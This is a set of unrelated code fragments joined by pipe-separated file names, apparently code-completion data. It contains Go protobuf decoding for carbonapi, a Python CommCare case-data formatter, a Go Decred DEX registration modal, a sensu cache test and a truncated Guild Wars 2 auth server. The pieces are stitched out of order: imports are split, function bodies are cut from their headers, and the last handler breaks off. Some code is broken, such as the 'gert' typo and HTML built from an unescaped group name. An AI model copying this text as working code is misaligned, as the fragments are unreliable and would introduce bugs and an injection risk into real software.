var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Tz = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 24:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field FromRaw", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.FromRaw = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 25:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field UntilRaw", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.UntilRaw = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 26:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Uri", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Uri = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 27:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field FromCache", wireType)
}
var v int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
v |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
m.FromCache = bool(v != 0)
case 28:
if wireType != 0 {
return fmt.Errorf("proto: wrong wireType = %d for field ZipperRequests", wireType)
}
m.ZipperRequests = 0
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
m.ZipperRequests |= (int64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
default:
iNdEx = preIndex
skippy, err := skipCarbonapi(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthCarbonapi
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func skipCarbonapi(dAtA []byte) (n int, err error) {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
wireType := int(wire & 0x7)
switch wireType {
case 0:
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
iNdEx++
if dAtA[iNdEx-1] < 0x80 {
break
}
}
return iNdEx, nil
case 1:
iNdEx += 8
return iNdEx, nil
case 2:
var length int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
length |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
iNdEx += length
if length < 0 {
return 0, ErrInvalidLengthCarbonapi
}
return iNdEx, nil
case 3:
for {
var innerWire uint64
var start int = iNdEx
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
innerWire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
innerWireType := int(innerWire & 0x7)
if innerWireType == 4 {
break
}
next, err := skipCarbonapi(dAtA[start:])
if err != nil {
return 0, err
}
iNdEx = start + next
}
return iNdEx, nil
case 4:
return iNdEx, nil
case 5:
iNdEx += 4
return iNdEx, nil
default:
return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
}
}
panic("unreachable")
}
var (
ErrInvalidLengthCarbonapi = fmt.Errorf("proto: negative length found during unmarshaling")
ErrIntOverflowCarbonapi = fmt.Errorf("proto: integer overflow")
)
func init() { proto.RegisterFile("carbonapi.proto", fileDescriptorCarbonapi) }
var fileDescriptorCarbonapi = []byte{
// 547 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x6c, 0x93, 0xcf, 0x6e, 0xd3, 0x40,
0x10, 0xc6, 0xe5, 0xa6, 0x75, 0x93, 0x6d, 0x9b, 0x96, 0xa5, 0x7f, 0xa6, 0x2d, 0x8d, 0x2c, 0x10,
0x22, 0x27, 0x24, 0xc4, 0x13, 0xb4, 0x05, 0x2a, 0x24, 0x84, 0x90, 0x81, 0xf3, 0x6a, 0x63, 0x4f,
0x92, 0x95, 0x1c, 0xaf, 0xd9, 0x5d, 0x53, 0x91, 0x27, 0xe4, 0xc8, 0x23, 0xa0, 0x9c, 0x79, 0x08,
0x34, 0xb3, 0x89, 0x41, 0x82, 0x9b, 0xbf, 0xdf, 0xcc, 0x7c, 0x3b, 0xbb, 0x33, 0x16, 0x87, 0x85,
0x76, 0x13, 0x5b, 0xeb, 0xc6, 0x3c, 0x6f, 0x9c, 0x0d, 0x56, 0xee, 0x75, 0xa0, 0x99, 0x3c, 0xfe,
0x95, 0x8a, 0xa3, 0xeb, 0xa2, 0x40, 0xef, 0xdf, 0xd9, 0xd9, 0x2b, 0x0c, 0xda, 0x54, 0x5e, 0x82,
0xd8, 0x9d, 0xeb, 0xba, 0xac, 0xd0, 0x41, 0x92, 0x25, 0xe3, 0x41, 0xbe, 0x91, 0xf2, 0xa9, 0x18,
0x76, 0xd5, 0xaa, 0x6d, 0x4d, 0x09, 0x5b, 0x9c, 0x70, 0xd0, 0xd1, 0xcf, 0xad, 0x29, 0xe5, 0x85,
0xe8, 0xb7, 0x1e, 0x5d, 0xad, 0x17, 0x08, 0x3d, 0x4e, 0xe8, 0xb4, 0x3c, 0x12, 0xbd, 0xd6, 0x55,
0xb0, 0xcd, 0x98, 0x3e, 0xe5, 0x99, 0xd8, 0x6d, 0x10, 0x9d, 0x32, 0x0d, 0xec, 0x30, 0x4d, 0x49,
0xbe, 0x6d, 0xe4, 0xa5, 0x18, 0x70, 0xa0, 0xb1, 0x2e, 0x40, 0x1a, 0x7d, 0x08, 0x7c, 0xb0, 0x2e,
0x48, 0x29, 0xb6, 0xe7, 0xd6, 0x07, 0xd8, 0x65, 0xce, 0xdf, 0xd4, 0xb8, 0xc3, 0x29, 0x3a, 0x74,
0xd0, 0x8f, 0x8d, 0xaf, 0xa5, 0x3c, 0x15, 0xe9, 0xd4, 0xba, 0x85, 0x0e, 0x30, 0x88, 0x47, 0x44,
0x45, 0x47, 0xb4, 0x1e, 0x55, 0xa1, 0x8b, 0x39, 0x82, 0xc8, 0x92, 0x71, 0x9f, 0x5b, 0xbd, 0x25,
0x4d, 0x76, 0x41, 0xbb, 0x19, 0x06, 0x0f, 0x7b, 0x59, 0x8f, 0xec, 0xd6, 0x52, 0x3e, 0x11, 0x07,
0x5c, 0xa2, 0x82, 0x59, 0xa0, 0x6d, 0x03, 0xec, 0x67, 0xc9, 0x78, 0x27, 0xdf, 0x67, 0xf8, 0x29,
0x32, 0x2a, 0x5f, 0x60, 0x70, 0xa6, 0xf0, 0x70, 0x10, 0xcb, 0xd7, 0x52, 0xbe, 0x10, 0x27, 0x73,
0xfd, 0x15, 0x55, 0x6d, 0x6b, 0x35, 0xd5, 0x41, 0x57, 0x0a, 0x9d, 0xb3, 0xce, 0xc3, 0x90, 0x3b,
0x90, 0x14, 0x7c, 0x6f, 0xeb, 0x37, 0x14, 0x7a, 0xcd, 0x11, 0xbe, 0x5a, 0x5b, 0xd3, 0x71, 0x70,
0x98, 0x25, 0xe3, 0x24, 0xdf, 0x48, 0xba, 0xc2, 0x3c, 0x84, 0x46, 0x15, 0xb6, 0x44, 0x38, 0xe2,
0x3e, 0xfa, 0x04, 0x6e, 0x6d, 0x89, 0xf2, 0x4e, 0x64, 0x71, 0x34, 0x4b, 0xd3, 0x34, 0xe8, 0x94,
0x43, 0xdf, 0xd8, 0xda, 0xa3, 0xf2, 0x66, 0x89, 0x6a, 0xf2, 0x2d, 0xa0, 0x87, 0x07, 0x59, 0x32,
0xee, 0xe5, 0x57, 0x7f, 0xe7, 0xe5, 0xeb, 0xb4, 0x8f, 0x66, 0x89, 0x37, 0x94, 0x24, 0xaf, 0xc5,
0xd5, 0x9f, 0xc9, 0xff, 0xcf, 0x45, 0xb2, 0xcb, 0x45, 0x97, 0xf4, 0xaf, 0xc5, 0xa9, 0x48, 0x1d,
0x6a, 0x6f, 0x6b, 0x78, 0x18, 0x67, 0x10, 0x95, 0xbc, 0x12, 0xc2, 0x63, 0x5d, 0xaa, 0x59, 0x65,
0x27, 0x1e, 0x8e, 0xf9, 0x09, 0x06, 0x44, 0xee, 0x08, 0xd0, 0xa0, 0xa7, 0xce, 0x2e, 0xe0, 0x84,
0xaf, 0xc6, 0xdf, 0xf2, 0x58, 0xec, 0xd0, 0xed, 0x2b, 0x38, 0x65, 0x18, 0x85, 0x1c, 0x8a, 0xad,
0xb0, 0x84, 0x33, 0x36, 0xdf, 0x0a, 0x4b, 0x79, 0x2e, 0xfa, 0x94, 0xad, 0x9c, 0xbe, 0x07, 0x88,
0xfb, 0x40, 0x3a, 0xd7, 0xf7, 0x3c, 0x77, 0xaa, 0xe1, 0xd8, 0xf9, 0x7a, 0x45, 0x09, 0x50, 0x90,
0x57, 0xd4, 0xc0, 0xc5, 0x66, 0x45, 0x0d, 0xb5, 0xc8, 0x4e, 0x71, 0x4f, 0x2e, 0x63, 0x8b, 0x44,
0xe2, 0xa2, 0x3c, 0x13, 0x87, 0xdd, 0xfb, 0x7e, 0x69, 0xd1, 0x07, 0x0f, 0x8f, 0xf8, 0x39, 0x86,
0x9b, 0xe7, 0x8c, 0xf4, 0x66, 0xff, 0xfb, 0x6a, 0x94, 0xfc, 0x58, 0x8d, 0x92, 0x9f, 0xab, 0x51,
0x32, 0x49, 0xf9, 0x87, 0x7c, 0xf9, 0x3b, 0x00, 0x00, 0xff, 0xff, 0xb6, 0xd6, 0xc1, 0xf2, 0xa3,
0x03, 0x00, 0x00,
}
| encodeFixed64Carbonapi |
cases.py | from django.urls import NoReverseMatch
from django.utils import html
from django.utils.translation import ugettext as _
from couchdbkit import ResourceNotFound
from casexml.apps.case.models import CommCareCaseAction
from corehq.apps.case_search.const import (
CASE_COMPUTED_METADATA,
SPECIAL_CASE_PROPERTIES,
SPECIAL_CASE_PROPERTIES_MAP,
)
from corehq.apps.es.case_search import flatten_result
from corehq.apps.groups.models import Group
from corehq.apps.locations.models import SQLLocation | from corehq.util.timezones.utils import parse_date
from corehq.util.view_utils import absolute_reverse
class CaseDataFormatter(BaseDataFormatter):
def __init__(self, request, domain, raw_data):
super(CaseDataFormatter, self).__init__(request, domain, raw_data)
self.raw_data = flatten_result(raw_data)
@property
def owner_id(self):
"""Special Case Property @owner_id"""
if 'owner_id' in self.raw_data:
return self.raw_data.get('owner_id')
elif 'user_id' in self.raw_data:
return self.raw_data.gert('user_id')
else:
return ''
@property
def date_opened(self):
"""Special Case Property date_opened"""
return self._fmt_dateprop('opened_on', False)
@property
def last_modified(self):
"""Special Case Property last_modified"""
return self._fmt_dateprop('modified_on', False)
@property
def closed_by_username(self):
"""Computed metadata"""
return self._get_username(self.closed_by_user_id)
@property
def last_modified_by_user_username(self):
"""Computed metadata"""
return self._get_username(self.raw_data.get('user_id'))
@property
def opened_by_username(self):
"""Computed metadata"""
user = self._creating_user
if user is None:
return _("No Data")
return user['name'] or self._user_not_found_display(user['id'])
@property
def owner_name(self):
"""Computed metadata"""
owner_type, owner = self._owner
if owner_type == 'group':
return '<span class="label label-default">%s</span>' % owner['name']
return owner['name']
@property
def closed_by_user_id(self):
"""Computed metadata"""
return self.raw_data.get('closed_by')
@property
def opened_by_user_id(self):
"""Computed metadata"""
user = self._creating_user
if user is None:
return _("No data")
return user['id']
@property
def server_last_modified_date(self):
"""Computed metadata"""
return self._fmt_dateprop('server_modified_on', False)
def get_context(self):
context = {}
context.update(self.raw_data)
context.update(self._case_info_context)
context['_link'] = self._link
return context
@property
def _link(self):
try:
return absolute_reverse(
'case_data', args=[self.domain, self.raw_data.get('_id')]
)
except NoReverseMatch:
return None
@property
def _case_info_context(self):
context = {}
for prop in SPECIAL_CASE_PROPERTIES + CASE_COMPUTED_METADATA:
context[prop] = self._get_case_info_prop(prop)
return context
def _get_case_info_prop(self, prop):
fmt_prop = prop.replace('@', '')
if hasattr(self, fmt_prop):
return getattr(self, fmt_prop)
elif prop in SPECIAL_CASE_PROPERTIES:
return self._get_special_property(prop)
raise NotImplementedError(
"CaseDataFormatter.{} not found".format(prop))
def _get_special_property(self, prop):
return (SPECIAL_CASE_PROPERTIES_MAP[prop]
.value_getter(self.raw_data))
def _fmt_dateprop(self, prop, iso=True):
val = report_date_to_json(
self.request,
self.domain,
parse_date(self.raw_data[prop])
)
if iso:
val = 'T'.join(val.split(' ')) if val else None
return val
@property
@quickcache(['self.owner_id'])
def _owning_group(self):
try:
return Group.get(self.owner_id)
except ResourceNotFound:
return None
@property
@quickcache(['self.owner_id'])
def _location(self):
return SQLLocation.objects.get_or_None(location_id=self.owner_id)
@property
@quickcache(['self.owner_id'])
def _owner(self):
if self._owning_group and self._owning_group.name:
return ('group', {'id': self._owning_group._id,
'name': self._owning_group.name})
elif self._location:
return ('location', {'id': self._location.location_id,
'name': self._location.display_name})
return ('user', self._user_meta(self.owner_id))
@property
def _creating_user(self):
try:
creator_id = self.raw_data['opened_by']
except KeyError:
creator_id = None
if 'actions' in self.raw_data:
for action in self.raw_data['actions']:
if action['action_type'] == 'create':
action_doc = CommCareCaseAction.wrap(action)
creator_id = action_doc.get_user_id()
break
if not creator_id:
return None
return self._user_meta(creator_id)
def _user_meta(self, user_id):
return {'id': user_id, 'name': self._get_username(user_id)}
def _user_not_found_display(self, user_id):
return _("Unknown [%s]") % user_id
@quickcache(['user_id'])
def _get_username(self, user_id):
if not user_id:
return None
try:
user = CouchUser.get_by_user_id(user_id)
if user:
return user.username
except CouchUser.AccountTypeError:
return None | from corehq.apps.reports.v2.models import BaseDataFormatter
from corehq.apps.reports.v2.utils import report_date_to_json
from corehq.apps.users.models import CouchUser
from corehq.util.quickcache import quickcache |
add_dex_modal.go | package dexclient
import (
"fmt"
"strconv"
"strings"
"decred.org/dcrdex/client/asset"
"decred.org/dcrdex/client/core"
"gioui.org/layout"
"gioui.org/widget"
"gioui.org/widget/material"
"github.com/planetdecred/dcrlibwallet"
"github.com/planetdecred/godcr/ui/decredmaterial"
"github.com/planetdecred/godcr/ui/load"
"github.com/planetdecred/godcr/ui/modal"
"github.com/planetdecred/godcr/ui/page/components"
"github.com/planetdecred/godcr/ui/values"
)
const testDexHost = "dex-test.ssgen.io:7232"
type addDexModal struct {
*load.Load
*decredmaterial.Modal
addDexServer decredmaterial.Button
dexServerAddress decredmaterial.Editor
isSending bool
cert decredmaterial.Editor
cancel decredmaterial.Button
materialLoader material.LoaderStyle
}
func newAddDexModal(l *load.Load) *addDexModal {
md := &addDexModal{
Load: l,
Modal: l.Theme.ModalFloatTitle("add_dex_modal"),
dexServerAddress: l.Theme.Editor(new(widget.Editor), "DEX Address"),
cert: l.Theme.Editor(new(widget.Editor), "Cert content"),
addDexServer: l.Theme.Button("Submit"),
cancel: l.Theme.OutlineButton("Cancel"),
materialLoader: material.Loader(l.Theme.Base),
}
md.dexServerAddress.Editor.SingleLine = true
if l.WL.MultiWallet.NetType() == dcrlibwallet.Testnet3 {
md.dexServerAddress.Editor.SetText(testDexHost)
}
return md
}
func (md *addDexModal) OnDismiss() {
md.dexServerAddress.Editor.SetText("")
}
func (md *addDexModal) OnResume() {
md.dexServerAddress.Editor.Focus()
}
func (md *addDexModal) Handle() {
if md.cancel.Button.Clicked() && !md.isSending {
md.Dismiss()
}
if md.addDexServer.Button.Clicked() {
if md.dexServerAddress.Editor.Text() == "" || md.isSending {
return
}
md.isSending = true
md.Modal.SetDisabled(true)
go func() {
cert := []byte(md.cert.Editor.Text())
dex, err := md.Dexc().DEXServerInfo(md.dexServerAddress.Editor.Text(), cert)
md.isSending = false
md.Modal.SetDisabled(false)
if err != nil {
md.Toast.NotifyError(err.Error())
return
}
// Ensure a wallet is connected that can be used to pay the fees.
// TODO: This automatically selects the dcr wallet if the DEX
// supports it for fee payment, otherwise picks a random wallet
// to use for fee payment. Should instead update the modal UI
// to show the options and let the user choose which wallet to
// set up and use for fee payment.
feeAssetName := "dcr"
feeAsset := dex.RegFees[feeAssetName]
if feeAsset == nil {
for feeAssetName, feeAsset = range dex.RegFees {
break
}
}
// Dismiss this modal before displaying a new one for adding a wallet
// or completing the registration.
md.Dismiss()
if md.Dexc().HasWallet(int32(feeAsset.ID)) {
md.completeRegistration(dex, feeAssetName, cert)
return
}
createWalletModal := newCreateWalletModal(md.Load,
&walletInfoWidget{
image: components.CoinImageBySymbol(md.Load, feeAssetName),
coinName: feeAssetName,
coinID: feeAsset.ID,
},
func() {
md.completeRegistration(dex, feeAssetName, cert)
})
md.ParentWindow().ShowModal(createWalletModal)
}()
}
}
func (md *addDexModal) Layout(gtx layout.Context) D {
w := []layout.Widget{
func(gtx C) D {
return md.Load.Theme.Label(values.TextSize20, "Add a dex").Layout(gtx)
},
func(gtx C) D {
return layout.Flex{Axis: layout.Vertical}.Layout(gtx,
layout.Rigid(func(gtx C) D {
return layout.Inset{Top: values.MarginPadding10}.Layout(gtx, func(gtx C) D {
return md.dexServerAddress.Layout(gtx)
})
}),
layout.Rigid(func(gtx C) D {
return layout.Inset{Top: values.MarginPadding15}.Layout(gtx, func(gtx C) D {
gtx.Constraints.Max.Y = 350
return md.cert.Layout(gtx)
})
}),
)
},
func(gtx C) D {
return layout.E.Layout(gtx, func(gtx C) D {
return layout.Flex{Axis: layout.Horizontal}.Layout(gtx,
layout.Rigid(func(gtx C) D {
if md.isSending {
return D{}
}
return layout.Inset{
Right: values.MarginPadding4,
Bottom: values.MarginPadding15,
}.Layout(gtx, md.cancel.Layout)
}),
layout.Rigid(func(gtx C) D {
if md.isSending {
return layout.Inset{
Top: values.MarginPadding10,
Bottom: values.MarginPadding15,
}.Layout(gtx, md.materialLoader.Layout)
}
return md.addDexServer.Layout(gtx)
}),
)
})
},
}
return md.Modal.Layout(gtx, w)
}
func (md *addDexModal) completeRegistration(dex *core.Exchange, feeAssetName string, cert []byte) {
appPasswordModal := modal.NewPasswordModal(md.Load).
Title("Confirm Registration").
Hint("App password").
Description(confirmRegisterModalDesc(dex, feeAssetName)).
NegativeButton(values.String(values.StrCancel), func() {}).
PositiveButton("Register", func(password string, pm *modal.PasswordModal) bool {
go func() {
_, err := md.Dexc().RegisterWithDEXServer(dex.Host,
cert,
int64(dex.Fee.Amt),
int32(dex.Fee.ID),
[]byte(password))
if err != nil {
pm.SetError(err.Error())
pm.SetLoading(false)
return
}
pm.Dismiss()
}()
return false
})
md.ParentWindow().ShowModal(appPasswordModal)
}
func confirmRegisterModalDesc(dex *core.Exchange, selectedFeeAsset string) string {
feeAsset := dex.RegFees[selectedFeeAsset]
feeAmt := formatAmount(feeAsset.ID, selectedFeeAsset, feeAsset.Amt)
txt := fmt.Sprintf("Enter your app password to confirm DEX registration. When you submit this form, %s will be spent from your wallet to pay registration fees.", feeAmt)
markets := make([]string, 0, len(dex.Markets))
for _, mkt := range dex.Markets {
lotSize := formatAmount(mkt.BaseID, mkt.BaseSymbol, mkt.LotSize)
markets = append(markets, fmt.Sprintf("Base: %s\tQuote: %s\tLot Size: %s", strings.ToUpper(mkt.BaseSymbol), strings.ToUpper(mkt.QuoteSymbol), lotSize))
}
return fmt.Sprintf("%s\n\nThis DEX supports the following markets. All trades are in multiples of each market's lot size.\n\n%s", txt, strings.Join(markets, "\n"))
}
func formatAmount(assetID uint32, assetName string, amount uint64) string | {
assetInfo, err := asset.Info(assetID)
if err != nil {
return fmt.Sprintf("%d [%s units]", amount, assetName)
}
unitInfo := assetInfo.UnitInfo
convertedLotSize := float64(amount) / float64(unitInfo.Conventional.ConversionFactor)
return fmt.Sprintf("%s %s", strconv.FormatFloat(convertedLotSize, 'f', -1, 64), unitInfo.Conventional.Unit)
} |
|
cache_test.go | package cache
import (
"context"
"reflect"
"testing"
"github.com/sensu/sensu-go/backend/store/etcd"
"github.com/sensu/sensu-go/types"
"github.com/coreos/etcd/integration"
corev2 "github.com/sensu/sensu-go/api/core/v2"
"github.com/sensu/sensu-go/backend/store"
"github.com/sensu/sensu-go/testing/fixture"
"github.com/sensu/sensu-go/types/dynamic"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func fixtureEntity(namespace, name string) *corev2.Entity {
entity := corev2.FixtureEntity(name)
entity.Namespace = namespace
return entity
}
func TestCacheGet(t *testing.T) {
cache := Resource{
cache: buildCache([]corev2.Resource{
fixtureEntity("a", "1"),
fixtureEntity("a", "2"),
fixtureEntity("a", "3"),
fixtureEntity("a", "4"),
fixtureEntity("a", "5"),
fixtureEntity("a", "6"),
fixtureEntity("b", "1"),
fixtureEntity("b", "2"),
fixtureEntity("b", "3"),
fixtureEntity("b", "4"),
fixtureEntity("b", "5"),
fixtureEntity("b", "6"),
fixtureEntity("c", "1"),
fixtureEntity("c", "2"),
fixtureEntity("c", "3"),
fixtureEntity("c", "4"),
fixtureEntity("c", "5"),
fixtureEntity("c", "6"),
},
true,
),
}
want := []Value{
{Resource: fixtureEntity("b", "1"), Synth: dynamic.Synthesize(fixtureEntity("b", "1"))},
{Resource: fixtureEntity("b", "2"), Synth: dynamic.Synthesize(fixtureEntity("b", "2"))},
{Resource: fixtureEntity("b", "3"), Synth: dynamic.Synthesize(fixtureEntity("b", "3"))},
{Resource: fixtureEntity("b", "4"), Synth: dynamic.Synthesize(fixtureEntity("b", "4"))},
{Resource: fixtureEntity("b", "5"), Synth: dynamic.Synthesize(fixtureEntity("b", "5"))},
{Resource: fixtureEntity("b", "6"), Synth: dynamic.Synthesize(fixtureEntity("b", "6"))},
}
got := cache.Get("b")
if !reflect.DeepEqual(got, want) {
t.Fatalf("bad resources: got %v, want %v", got, want)
}
}
func TestBuildCache(t *testing.T) {
resource1 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}}
resource2 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource2", Namespace: "default"}}
resource3 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource3", Namespace: "acme"}}
cache := buildCache([]corev2.Resource{resource1, resource2, resource3}, false)
assert.Len(t, cache["acme"], 1)
assert.Len(t, cache["default"], 2)
assert.Len(t, cache, 2)
}
func TestResourceUpdateCache(t *testing.T) {
cacher := Resource{
cache: make(map[string][]Value),
}
resource0 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource0", Namespace: "default"}, Foo: "bar"}
resource1 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}, Foo: "bar"}
resource0Bis := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource0", Namespace: "default"}, Foo: "baz"}
resource1Bis := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}, Foo: "qux"}
// Add a resource
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: resource1,
Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 1)
// Add a second resource. It should be alphabetically sorted and therefore at
// the beginning of the namespace cache values even if it was appended at the
// end
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: resource0, Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 2)
assert.Equal(t, resource0, cacher.cache["default"][0].Resource)
assert.Equal(t, resource1, cacher.cache["default"][1].Resource)
// Update the resources
updates := []store.WatchEventResource{
store.WatchEventResource{Resource: resource0Bis, Action: store.WatchUpdate},
store.WatchEventResource{Resource: resource1Bis, Action: store.WatchUpdate},
}
cacher.updates = append(cacher.updates, updates...)
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 2)
assert.Equal(t, resource0Bis, cacher.cache["default"][0].Resource.(*fixture.Resource))
assert.Equal(t, resource1Bis, cacher.cache["default"][1].Resource.(*fixture.Resource))
// Delete the resources
deletes := []store.WatchEventResource{
store.WatchEventResource{Resource: resource1Bis, Action: store.WatchDelete},
store.WatchEventResource{Resource: resource0Bis, Action: store.WatchDelete},
}
cacher.updates = append(cacher.updates, deletes...)
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 0)
// Invalid watch event
var nilResource *fixture.Resource
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: nilResource,
Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 0)
}
func TestResourceRebuild(t *testing.T) {
c := integration.NewClusterV3(t, &integration.ClusterConfig{Size: 1})
defer c.Terminate(t)
client := c.RandClient()
s := etcd.NewStore(client, "store")
require.NoError(t, s.CreateNamespace(context.Background(), types.FixtureNamespace("default")))
ctx := store.NamespaceContext(context.Background(), "default")
cacher := Resource{
cache: make(map[string][]Value),
client: client,
resourceT: &fixture.Resource{},
}
// Empty store
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError, | cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 0)
// Resource added to a new namespace
foo := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "foo", Namespace: "default"}}
if err := s.CreateOrUpdateResource(ctx, foo); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 1)
// Resource added to an existing namespace
bar := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "bar", Namespace: "default"}}
if err := s.CreateOrUpdateResource(ctx, bar); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 2)
// Resource updated
bar.Foo = "acme"
if err := s.CreateOrUpdateResource(ctx, bar); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 2)
// Resource deleted
if err := s.DeleteResource(ctx, bar.StorePrefix(), bar.GetObjectMeta().Name); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 1)
} | }) |
gw2_authserver.py | # (c) 2019-2020 Mikhail Paulyshka
# SPDX-License-Identifier: MIT
import os.path
import aiohttp
import common.mglx_webserver
from .gw2_constants import GW2AuthorizationResult
class Gw2AuthServer(common.mglx_webserver.MglxWebserver):
def __init__(self, gw2api = None):
super(Gw2AuthServer, self).__init__()
self.__gw2api = gw2api
self.add_route('GET', '/', self.handle_login_get)
self.add_route('GET', '/login', self.handle_login_get)
self.add_route('GET', '/login_baddata', self.handle_login_baddata_get)
self.add_route('GET', '/login_failed', self.handle_login_baddata_get)
self.add_route('GET', '/login_noaccount', self.handle_login_noaccount_get)
self.add_route('GET', '/finished', self.handle_finished_get)
self.add_route('POST', '/', self.handle_login_post)
self.add_route('POST', '/login', self.handle_login_post)
#
# Handlers
#
async def handle_login_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login.html'))
async def handle_login_baddata_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_baddata.html'))
async def handle_login_failed_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_failed.html'))
async def handle_login_noaccount_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_noaccount.html'))
async def handle_finished_get(self, request):
